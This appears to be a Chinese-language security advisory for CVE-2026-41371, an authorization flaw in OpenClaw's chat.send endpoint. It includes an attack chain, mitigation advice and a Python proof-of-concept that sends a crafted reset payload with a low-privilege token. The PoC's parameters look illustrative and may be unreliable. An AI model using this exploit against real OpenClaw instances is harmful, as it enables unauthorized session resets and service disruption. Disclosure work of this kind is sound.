CVE-2026-41371 CVSS 8.5 高危

CVE-2026-41371 OpenClaw权限提升漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41371

漏洞类型

权限提升

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.28之前的版本中存在权限提升漏洞。该漏洞位于chat.send组件，由于未正确实施授权检查，拥有写入权限的网关调用者可以触发仅限管理员执行的会话重置操作。攻击者可利用此漏洞轮换目标会话、归档先前的转录状态并强制生成新的会话ID，而无需管理员权限，从而破坏系统完整性和可用性。

技术细节

该漏洞源于OpenClaw的chat.send接口中存在的不当授权验证逻辑。在受影响版本中，系统未能严格区分普通网关调用者与管理员在执行会话管理操作时的权限边界。具体而言，攻击者仅需具备低权限的写入作用域，即可通过构造特定的请求参数，调用本应受保护的管理员会话重置功能。利用该漏洞，攻击者可以执行包括会话轮换、强制归档当前对话记录以及重置会话ID等敏感操作。这种权限绕过不仅破坏了系统的完整性，还可能导致服务可用性下降及机密性风险，使得低权限用户能够控制会话状态，绕过安全审计或中断正常服务流程。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标使用的是OpenClaw且版本低于2026.3.28。

STEP 2

2. 获取访问权限

攻击者注册或获取一个具有写入权限的低级别网关调用者令牌。

STEP 3

3. 漏洞利用

攻击者向chat.send接口发送特制的恶意请求，包含会话重置和归档参数。

STEP 4

4. 完成攻击

系统错误地执行了管理员级别的会话重置操作，导致会话轮换和旧数据归档。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_openclaw(target_url, token):
    """
    PoC for CVE-2026-41371: Privilege Escalation via chat.send
    This script demonstrates how a low-privileged user can trigger
    admin-only session reset operations.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # Payload to trigger session reset (admin scope action)
    payload = {
        "command": "reset",
        "rotate_session": True,
        "archive_transcript": True,
        "force_new_id": True
    }
    
    try:
        # Send request to the vulnerable endpoint
        response = requests.post(f"{target_url}/api/chat.send", json=payload, headers=headers)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Session reset triggered.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-openclaw-instance"
    user_token = "LOW_PRIVILEGE_TOKEN_HERE"
    exploit_openclaw(target, user_token)

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施

如果无法立即升级，建议在网络层（如WAF）阻断对chat.send接口中包含reset参数的请求，或暂时禁用普通用户的会话写入权限，直到补丁应用完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表